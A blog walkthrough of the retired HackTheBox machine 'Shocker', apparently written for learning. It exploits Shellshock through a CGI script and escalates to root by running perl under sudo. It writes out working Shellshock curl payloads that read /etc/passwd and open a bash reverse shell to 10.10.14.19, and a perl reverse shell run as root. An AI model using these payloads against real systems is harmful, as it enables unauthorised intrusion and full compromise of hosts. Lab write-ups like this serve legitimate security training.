HackTheBox - Shocker - Retired - Update

HacktheBox - Shocker - Retired 

Recon

I've been using threader3000 for my recon scan lately. It does a super quick threaded up/down scan on all TCP ports then recommends a nmap scan based on those results. It saves the nmap scan as an xml file for you too.

I like to convert the XML to HTML to make it easy to read.

xsltproc ./shocker.htb/shocker.htb.xml -o ./shocker.html

Just two ports open, nmap says it's an ubuntu box.

Port 80         Apache         2.4.18

Port         2222 OpenSSH 7.2p2

That's a non-standard port for SSH usually we see it on the default port of 22.

Let's see what apache is serving us.

Weird. The source code doesn't give us much to go on either.

Let's try a brute force scan on port 80 to see if we can find some other pages or directories that might give us more.

dirb http://shocker.htb

We didn't get much back from dirb except two things that we don't have access to

So this image got me thinking, I'm sure how you would get here without previous knowledge but

The image looks like some sort of bug…. Being bashed.  As in Bash Bug… and then the name of the box shocker…..

Shellshocker bash bug

https://github.com/opsxcq/exploit-CVE-2014-6271

I wonder if we can find a .sh file on here we might be able to leverage.

We can tell dirb to search for specific extensions using the -X switch

dirb http://shocker.htb/cgi-bin/ -X .sh

Bingo

user.sh

Content-Type: text/plain Just an uptime test script 20:18:48 up  1:30,  0 users,  load average: 0.00, 0.00, 0.00

Exploit

Ok so if this susceptible to shellshock we should be able to modify this to get us /etc/passwd

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \ http://localhost:8080/cgi-bin/vulnerable

So ours would look like this

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \ http://shocker.htb/cgi-bin/user.sh

Yeah boy… we we found a potential path to a foothold on shocker

Let's see if we can get a pingback from shocker.

First let's setup tcpdump to capture any icmp traffic on our VPN tunnel

tcpdump -i tun0 -n icmp

Then we just modify our curl request. To do ping -c4 10.10.14.19

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'ping -c 4 10.10.14.19'" \ > http://shocker.htb/cgi-bin/user.sh

We do, awesome

Let's start with setting up our listener on our kali box

nc -lnvp 5555

I tried modifying this to do a netcat connection back but I never caught a shell.

So I googled reverse shells and went to payloadallthethings to find some different shells to try

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Now let's try a bash reverse shell shell which looks like this

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Modify this to be our IP and Port

bash -i >& /dev/tcp/10.10.14.19/5555 0>&1

And replace the command section of our curl request so it would look like 

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/5555 0>&1'" \ http://shocker.htb/cgi-bin/user.sh

And we finally caught our shell, our foothold

From here we can get the user.txt 

Now we need to figure out how to escalate to root..

I used updog on mykali box to serv linpeas.sh over to shocker.

wget http://10.10.14.19:9090/linpeas.sh

Then gave linpeas execution rights

chmod +x ./linpeas.sh

Linpeas is a script that polls alot of information about the system and highlight potential vectors on privilege escalation. I use this on almost all linux boxes.

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Check out what it found.

Shelly can run perl as root without a password ( which is handy since we don't know what their password is )

And back on the payloadallthethings site there is a perl based reverse shell we can try to use.

perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

So let's setup a new listener on kali to try and catch this shell

nc -lncp 5566

Then we can just modify their perl command to be our ip and new port we are listening on

perl -e 'use Socket;$i="10.10.14.19";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Then throw a sudo in front of it so it runs as root.

shelly@Shocker:$ sudo perl -e 'use Socket;$i="10.10.14.19";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' <en(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

And just like that we are root

 And we can cat out the root flag.